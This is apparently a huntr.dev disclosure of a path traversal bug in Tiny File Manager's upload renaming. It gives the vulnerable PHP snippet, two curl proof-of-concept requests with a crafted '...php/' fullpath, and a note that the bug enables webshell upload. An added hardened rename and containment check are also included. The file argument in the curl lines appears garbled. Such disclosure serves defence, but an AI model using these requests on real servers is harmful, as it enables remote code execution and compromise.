huntr | Joaogmauricio | 5995A93F-0C4B-4F7D-AA59-A64424219424
Feb 15, 2022 - 10:08 a.m.

Path Traversal in prasathmani/tinyfilemanager

2022-02-15 10:08:04
joaogmauricio
www.huntr.dev

EPSS: 0.002 (Low), percentile 55.0%

Description

A Path Traversal vulnerability exists in Tiny File Manager that allows files to be uploaded to an arbitrary location on the server. The flaw derives from the way file upload/creation is handled when a file with the same name already exists in the target directory.

Affected Code Snippet

// tinyfilemanager.php
// ... snippet ...
if (file_exists($fullPath) && !$override_file_name) {
    $ext_1 = $ext ? '.'.$ext : '';
    $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;
}
// ... snippet ...

If we look at how str_replace is used to separate the old filename from its extension, we can see that it removes every occurrence of the extension from the whole fullpath parameter, not only the trailing one, so each "...php" segment collapses to "..". Therefore, if an attacker sends, for example, two consecutive requests with fullpath ...php/...php/...php/...php/...php/var/www/html/benign.php and filename shell.php, it will move the uploaded file to ../../../../../var/www/html/benign_<DATE>.php.
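
The renaming step from the snippet above, next to a variant that rewrites only the final path component, plus a containment check on the resolved target directory. This is an added example, not code from the report or from Tiny File Manager; the function names and the temp-directory upload root are assumptions.

```php
<?php
// Added example, not Tiny File Manager's code; function names and the
// upload root are assumptions made for illustration.

// Renaming logic from the affected snippet, isolated for comparison.
function rename_vulnerable(string $fullPath, string $ext): string
{
    $ext_1 = $ext ? '.' . $ext : '';
    // str_replace() strips every ".php" in the path, not just the suffix.
    return str_replace($ext_1, '', $fullPath) . '_' . date('ymdHis') . $ext_1;
}

// Hardened variant: only the final path component is rewritten.
function rename_safe(string $fullPath): string
{
    $info = pathinfo($fullPath);
    $ext  = isset($info['extension']) ? '.' . $info['extension'] : '';
    return $info['dirname'] . '/' . $info['filename'] . '_' . date('ymdHis') . $ext;
}

// Containment check: the resolved target directory must sit under the root.
function is_inside_root(string $root, string $candidate): bool
{
    $rootReal = realpath($root);
    $dirReal  = realpath(dirname($candidate));
    if ($rootReal === false || $dirReal === false) {
        return false; // unresolvable paths are rejected
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($dirReal . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) === 0;
}

// fullpath value taken from the report; the root is a constructed stand-in.
$fullPath = '...php/...php/...php/...php/...php/var/www/html/benign.php';
$root     = sys_get_temp_dir();

echo rename_vulnerable($fullPath, 'php'), PHP_EOL; // directory segments rewritten
echo rename_safe($fullPath), PHP_EOL;              // directory segments preserved

// Run the check on the final path, after any renaming, before writing the file.
var_dump(is_inside_root($root, $root . '/' . rename_vulnerable($fullPath, 'php')));
var_dump(is_inside_root($root, $root . '/' . rename_safe('benign.php')));
```

The containment check relies on realpath(), so the target directory must already exist when it runs.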

Proof of Concept

curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>

Impact

By leveraging this vulnerability to upload a webshell, it’s possible to achieve RCE on the server/container.
